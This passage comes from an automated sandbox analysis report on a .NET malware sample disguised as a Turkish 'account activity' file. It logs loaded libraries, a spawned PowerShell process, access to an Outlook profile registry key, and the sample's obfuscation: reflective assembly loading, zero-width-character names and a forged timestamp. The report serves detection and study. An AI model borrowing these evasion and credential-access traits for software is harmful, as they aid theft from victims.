                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Users\user\Desktop\hesaphareketi-01.exe "C:\Users\user\Desktop\hesaphareketi-01.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: hesaphareketi-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: hesaphareketi-01.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: hesaphareketi-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: tEaO.pdbSHA256 source: hesaphareketi-01.exe
                  Source: Binary string: tEaO.pdb source: hesaphareketi-01.exe

                  Data Obfuscation

                  barindex
                  Source: hesaphareketi-01.exe, authorizationForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, NyvrOwANqHHPpEqfI2.cs.Net Code: bOfN5fYpQ0 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.hesaphareketi-01.exe.56e0000.4.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, NyvrOwANqHHPpEqfI2.cs.Net Code: bOfN5fYpQ0 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.hesaphareketi-01.exe.3eba230.2.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: hesaphareketi-01.exeStatic PE information: 0x90DC47B8 [Sun Jan 6 02:43:04 2047 UTC]
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_06F6D230 pushad ; retf 0_2_06F6D231
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_06F6C82A push eax; retf 0_2_06F6C82D
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_011D9C30 push esp; retf 011Fh4_2_011D9D55
                  Source: hesaphareketi-01.exeStatic PE information: section name: .text entropy: 7.58541302254658
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, W4YSgpXx1TLZ2wuZI4.csHigh entropy of concatenated method names: 'ON4iJAfUus', 'wWeiWqINS4', 'qmeis8cequ', 'loTio5Df3r', 'L6giuChufQ', 'BGGivMsR00', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, Lru2IQueJDeFM6MNgS.csHigh entropy of concatenated method names: 'wyIxkdZBbf', 's5OxyWk0hN', 'k76xuZJI9R', 'zFZxdg53H6', 'yOIxWsP3sE', 'ThUxs9EcgP', 'i6mxoor4Hb', 'ULHxvOEwwV', 'qVnxOaj5ob', 'lNGx3BBUUD'
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, AWEkJ5qunuLJQqAYM9.csHigh entropy of concatenated method names: 'Dispose', 'wAljXeLvR2', 'bVd7WKja8L', 'Ek5lljZyiP', 'JeqjLig4fW', 'yNnjzik6b5', 'ProcessDialogKey', 'Qsw7r4YSgp', 'o1T7jLZ2wu', 'SI477mKaYZ'
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, BDUJmYCmvtMfBTT66g.csHigh entropy of concatenated method names: 'PfeDVlXivY', 'fh3DmheNpD', 'ToString', 'OnFDhQohdP', 'CKkDqrR9bH', 'YXPDKNlH02', 'i87D4ZUMJd', 'aF9Dce6yOj', 'ufCDIfcjLb', 'qvFDAQuNgC'
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, B25QqgNEisqhgpsLwd.csHigh entropy of concatenated method names: 'UpUjI42tUD', 'WqVjAMVIAc', 'Ja3jV5rUqQ', 'wsSjmY4BSx', 'N53jx7eOdj', 'cA7jYcmgyH', 'yUJX9DSG3oxAsYdHXo', 'csoVAoJNHJNK7VWNNl', 'XOGjjRPB8Z', 'gCGjF24PXf'
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, mWRLGq3HKbKsiVEl4x.csHigh entropy of concatenated method names: 'haAIh1qHPM', 'jxeIKM6Pux', 'MLQIcbAJ7i', 'KONcLfJyPv', 'fMNcztQn7w', 'RKFIrru9Mf', 'cPYIjPdXr6', 't3cI7P5ifp', 'SwNIFGtY7Z', 'kQGINgSFRu'
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, bVfaPLzIGqxh2txVLx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JbmGPLLQ98', 'SyNGxInUaU', 'NKGGYFdx4t', 'o9GGD8MHob', 'Y56Gif2pZ9', 'loiGGfYf7B', 'TBQGR7SB0a'
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, LATEJv0a35rUqQfsSY.csHigh entropy of concatenated method names: 'HgWKSU01ds', 'iZ6KeevvP8', 'LBsKaUKB1g', 'LRUK0TxARd', 'bisKx4H4AV', 'R4lKY7n8cR', 'XaXKDoh55l', 'vlrKi5mZ3S', 'w20KGVu1Ly', 'EOFKRwuCw3'
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, iBSxP497a3eAak537e.csHigh entropy of concatenated method names: 'Se141VLmW3', 'SSr4Tak5Vd', 'IRQKsjRKGV', 'foPKodsG0r', 'QS2KvJKLNG', 'GKoKOjuGmO', 'xiyK30s4Nj', 'tWOKHQlLEm', 'mVxKQA4KIZ', 'QabKkmV3xo'
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, wQsyN3jrFRx4eqkJswY.csHigh entropy of concatenated method names: 'dVEGU9PYsh', 'PaiGl6fJxS', 'wLrG5tNGOb', 'bFUGSEOkjW', 's86G1TpNSv', 'vniGeO9cEG', 'uWwGT4riIR', 'kQbGa8lI2a', 'SOaG06bh62', 'G8dG9eNt80'
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, Bqig4fBWlNnik6b5Es.csHigh entropy of concatenated method names: 'vFUihx7lg0', 'YUmiqTlJpQ', 'syLiKllxXG', 'Yu0i4RrVTh', 'qMMicxgP6L', 'DlBiIlaers', 'eugiAWlgCn', 'nUUin20XSY', 'QYDiVZNYub', 'FMRimmiCOD'
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, nKaYZGLEjFqgbEAG6K.csHigh entropy of concatenated method names: 'eHVGjXxZwP', 'UJbGF0rLN9', 'WLwGN7AhHP', 'FT1Gh1H0ar', 'ppNGqQ4k9p', 'TZ9G4JIyrJ', 'nIdGclT3BE', 'GQniwwmWSC', 'StgiBEYLEU', 'wa5iXAnYjL'
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, BHfgTHERtp2uwV61pr.csHigh entropy of concatenated method names: 'dqNPa3fFjB', 'GMEP0laN53', 'YsDPJp68Uj', 'HvyPWQfjg8', 'Wd2Po3EFxG', 'T7ZPvuEW7u', 'LEFP3cytBw', 'HuEPHmGDLI', 'dDMPkDaRw0', 'aRRPb0F7Jr'
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, ekPH56jFBHPcSRygsU9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rGDRuGOgyt', 'JY1RdLCuGy', 'fwcRZCu45K', 'dSURC4IZcS', 'Ja8RgcARLX', 'mRcRMGsxnn', 'QcBRwQEtHB'
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, BsutTpQm8aKu0PAwGq.csHigh entropy of concatenated method names: 'FcoIUHJ9pU', 'NT0Il8M77o', 'KR3I5Z5p4V', 'NBcIScu5Zs', 'aM1I1uCmVn', 'B2nIeg0AfX', 'Im6ITPi7J5', 'axvIaTLJBy', 'BkvI0ESD2d', 'Tc3I9fdhtC'
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, w6oIrjjjrH6HSVsxJou.csHigh entropy of concatenated method names: 'ToString', 'bfWRFMR5hL', 'KGWRNnKnny', 'su8R2vr7Ar', 'UlCRhOvXhn', 'vgTRqDXl85', 'uQYRKUClcD', 'OH7R4jWkUl', 'prlEfOCG1InbX77IVTr', 'zvMFdxCzALKODgRGjEG'
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, NyvrOwANqHHPpEqfI2.csHigh entropy of concatenated method names: 'CHkF2C8msq', 'CxYFhsTGxb', 'qvKFq9INku', 'bijFKUlgFN', 'krGF4HNJyx', 'fOJFcRtSJA', 'DKbFIhtXVw', 'bbYFAkLh7H', 'GotFnP628d', 'jgMFVpA01I'
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, x42tUDawqVMVIAc1ru.csHigh entropy of concatenated method names: 'dyqquaE5xO', 'H2FqdtNPxY', 'xITqZQGgEq', 'mgFqCr1Tei', 'MyKqgDy1Tm', 'JHdqM3uCdc', 'Y9IqwFXjYv', 'UPpqBQQhAD', 'SUSqX6EGK8', 'zXCqLJPBWM'
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, KMtGXDZWdhSH9pvSxH.csHigh entropy of concatenated method names: 'ToString', 'PW5YbughMM', 'EHeYWpOOkf', 'a6XYsCJW1L', 'zmiYoXiHcC', 'aY9YvLTMpT', 'FKAYOQB2Tf', 'WsQY30qtlE', 'CmwYH5c7VH', 'djVYQZh3Ft'
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, BTpc3J7D3SBEyv9U7p.csHigh entropy of concatenated method names: 'rgq57vCpc', 'w31SVODfF', 'nVZebC1u8', 'y6QTF9PCV', 'YaL0DBsNM', 'ChD9UOvfo', 'SvUYG5pthpvtDTvu5H', 'iSdfnkj98oWKop00Bf', 'VXFiQJe71', 'JavRgyQTJ'
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, KdjFA7JcmgyHHD8gwD.csHigh entropy of concatenated method names: 'Y0Uc24u9su', 'LivcqLdDBo', 's1fc4ow9NB', 'P9fcIYusyv', 'KYqcA90dZy', 'DvC4g0KK79', 'vQm4MeWeL1', 'GIw4wOOMim', 'WqV4BCjLds', 'V8L4X7El8L'
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, Peg55JMlLh2fxtSMAh.csHigh entropy of concatenated method names: 'ppTDBeME1g', 'jR8DLMWwkJ', 'LsKirsFEDH', 'nKbij87e9J', 's4VDbR6oNP', 'c7bDy1VUFL', 'zFSDEK3SF0', 'CieDudkYTQ', 'xR6DdWSI0k', 'heADZHDjxu'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, W4YSgpXx1TLZ2wuZI4.csHigh entropy of concatenated method names: 'ON4iJAfUus', 'wWeiWqINS4', 'qmeis8cequ', 'loTio5Df3r', 'L6giuChufQ', 'BGGivMsR00', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, Lru2IQueJDeFM6MNgS.csHigh entropy of concatenated method names: 'wyIxkdZBbf', 's5OxyWk0hN', 'k76xuZJI9R', 'zFZxdg53H6', 'yOIxWsP3sE', 'ThUxs9EcgP', 'i6mxoor4Hb', 'ULHxvOEwwV', 'qVnxOaj5ob', 'lNGx3BBUUD'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, AWEkJ5qunuLJQqAYM9.csHigh entropy of concatenated method names: 'Dispose', 'wAljXeLvR2', 'bVd7WKja8L', 'Ek5lljZyiP', 'JeqjLig4fW', 'yNnjzik6b5', 'ProcessDialogKey', 'Qsw7r4YSgp', 'o1T7jLZ2wu', 'SI477mKaYZ'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, BDUJmYCmvtMfBTT66g.csHigh entropy of concatenated method names: 'PfeDVlXivY', 'fh3DmheNpD', 'ToString', 'OnFDhQohdP', 'CKkDqrR9bH', 'YXPDKNlH02', 'i87D4ZUMJd', 'aF9Dce6yOj', 'ufCDIfcjLb', 'qvFDAQuNgC'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, B25QqgNEisqhgpsLwd.csHigh entropy of concatenated method names: 'UpUjI42tUD', 'WqVjAMVIAc', 'Ja3jV5rUqQ', 'wsSjmY4BSx', 'N53jx7eOdj', 'cA7jYcmgyH', 'yUJX9DSG3oxAsYdHXo', 'csoVAoJNHJNK7VWNNl', 'XOGjjRPB8Z', 'gCGjF24PXf'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, mWRLGq3HKbKsiVEl4x.csHigh entropy of concatenated method names: 'haAIh1qHPM', 'jxeIKM6Pux', 'MLQIcbAJ7i', 'KONcLfJyPv', 'fMNcztQn7w', 'RKFIrru9Mf', 'cPYIjPdXr6', 't3cI7P5ifp', 'SwNIFGtY7Z', 'kQGINgSFRu'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, bVfaPLzIGqxh2txVLx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JbmGPLLQ98', 'SyNGxInUaU', 'NKGGYFdx4t', 'o9GGD8MHob', 'Y56Gif2pZ9', 'loiGGfYf7B', 'TBQGR7SB0a'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, LATEJv0a35rUqQfsSY.csHigh entropy of concatenated method names: 'HgWKSU01ds', 'iZ6KeevvP8', 'LBsKaUKB1g', 'LRUK0TxARd', 'bisKx4H4AV', 'R4lKY7n8cR', 'XaXKDoh55l', 'vlrKi5mZ3S', 'w20KGVu1Ly', 'EOFKRwuCw3'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, iBSxP497a3eAak537e.csHigh entropy of concatenated method names: 'Se141VLmW3', 'SSr4Tak5Vd', 'IRQKsjRKGV', 'foPKodsG0r', 'QS2KvJKLNG', 'GKoKOjuGmO', 'xiyK30s4Nj', 'tWOKHQlLEm', 'mVxKQA4KIZ', 'QabKkmV3xo'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, wQsyN3jrFRx4eqkJswY.csHigh entropy of concatenated method names: 'dVEGU9PYsh', 'PaiGl6fJxS', 'wLrG5tNGOb', 'bFUGSEOkjW', 's86G1TpNSv', 'vniGeO9cEG', 'uWwGT4riIR', 'kQbGa8lI2a', 'SOaG06bh62', 'G8dG9eNt80'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, Bqig4fBWlNnik6b5Es.csHigh entropy of concatenated method names: 'vFUihx7lg0', 'YUmiqTlJpQ', 'syLiKllxXG', 'Yu0i4RrVTh', 'qMMicxgP6L', 'DlBiIlaers', 'eugiAWlgCn', 'nUUin20XSY', 'QYDiVZNYub', 'FMRimmiCOD'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, nKaYZGLEjFqgbEAG6K.csHigh entropy of concatenated method names: 'eHVGjXxZwP', 'UJbGF0rLN9', 'WLwGN7AhHP', 'FT1Gh1H0ar', 'ppNGqQ4k9p', 'TZ9G4JIyrJ', 'nIdGclT3BE', 'GQniwwmWSC', 'StgiBEYLEU', 'wa5iXAnYjL'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, BHfgTHERtp2uwV61pr.csHigh entropy of concatenated method names: 'dqNPa3fFjB', 'GMEP0laN53', 'YsDPJp68Uj', 'HvyPWQfjg8', 'Wd2Po3EFxG', 'T7ZPvuEW7u', 'LEFP3cytBw', 'HuEPHmGDLI', 'dDMPkDaRw0', 'aRRPb0F7Jr'
